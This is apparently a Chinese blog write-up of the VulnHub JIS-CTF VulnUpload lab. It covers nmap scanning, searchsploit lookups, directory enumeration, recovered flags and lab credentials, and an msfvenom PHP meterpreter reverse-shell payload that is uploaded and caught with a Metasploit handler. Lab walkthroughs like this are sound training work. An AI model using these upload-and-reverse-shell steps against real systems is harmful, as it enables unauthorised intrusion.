• JIS-CTF_VulnUpload靶机


    仅供个人娱乐

    靶机信息

     下载地址:https://www.vulnhub.com/entry/jis-ctf-vulnupload,228/

    一、网卡设置

    设置为NAT模式,

    使用vi去修改/etc/network/interface

    修改保存重启,启动网卡username 3: technawi   password : 3vilH@ksor

    二、主机探测

    nmap -sn 192.168.47.0/24

    nmap -n -vv -T5 -sn 192.168.47.0/24 | grep -B 1 'Host is up'

    三、端口扫描

    JIS 在 22 端口开启了 SSH(OpenSSH 7.2p2)、80 端口开启 HTTP(Apache httpd 2.4.18)等两个服务。另外,操作系统为 ubuntu。这三个信息将成为下个阶段的主要攻击面。

    cd /usr/share/exploitdb/exploits/linux/remote/

    python 40136.py -U '/root/user.txt' -e 192.168.47.137

    searchsploit openssh

    有两个漏洞,依次为本地提权的漏洞、远程命令执行漏洞。

    对前者而言,当前没用任何据点(如webshell),还谈不上提权操作,当前只能先放放,后续可能用的上;

    对后者来说,利用条件非常严苛,攻击者必须拿到 forwardedagent-socket 的控制权,而且目标必须 SSH 登录攻击者所控制 forwarded agent-socket的那台机器,才可能让目标加载指定 *.so,实现远程命令执行。

    漏洞为漏洞内存泄漏的漏洞

    查看web页面

    首先查看源码

    dirb http://192.168.47.137

    通过 engagement tools – discover content,启用子目录枚举功能

    这里已经知道了后端语言是php,所以就只枚举php文件

    爬取网站

    在sitemap搜索一下flag

     The 1st flag is : {8734509128730458630012095}

    The 2nd flag is : {7412574125871236547895214}

    username : admin

    password : 3v1l_H@ck3r

    上传文件

    我们爬到的uploads跟uploaded_files文件夹,去尝试访问

    msfvenom --payload php/meterpreter/reverse_tcp LHOST=192.168.47.128 LPORT=4444 --format raw --out ./php.php

    上传木马

    msf5 > use exploit/multi/handler

    msf5 exploit(multi/handler) > set payload /php/meterpreter/reverse_tcp

    se[-] The value specified for payload is not valid.

    msf5 exploit(multi/handler) > set payload php/meterpreter/reverse_tcp

    payload => php/meterpreter/reverse_tcp

    msf5 exploit(multi/handler) > set Lhost 192.168.47.128

    Lhost => 192.168.47.128

    msf5 exploit(multi/handler) > set LPORT 4444

    LPORT => 4444

    msf5 exploit(multi/handler) > run

    信息收集

    发现了在technawi的用户目录下有.sudo_as_admin_successful文件,所以我们只要拥有technawi用户,就有root权限

    再去找找文件中有没technawi

    grep -ri --exclude-dir=proc/ 'technawi' / 2> /dev/null

    ssh登录



  • 相关阅读:
    *ecshop 首页促销价显示倒计时
    *ecshop 限制文章帮助文章显示条数
    maven编码 gbk 的不可映射字符
    Java通过httpclient获取cookie模拟登录
    分布式系统session一致性问题
    分布式Session的几种实现方式
    httpclient 登录成功后返回的cookie值访问下一页面
    HttpClient使用GET方式通过代理服务器读取页面的例子
    HTTP请求如何带参
    JAVA的array中indexOf
  • 原文地址:https://www.cnblogs.com/bingtang123/p/12838383.html
Copyright © 2020-2023  润新知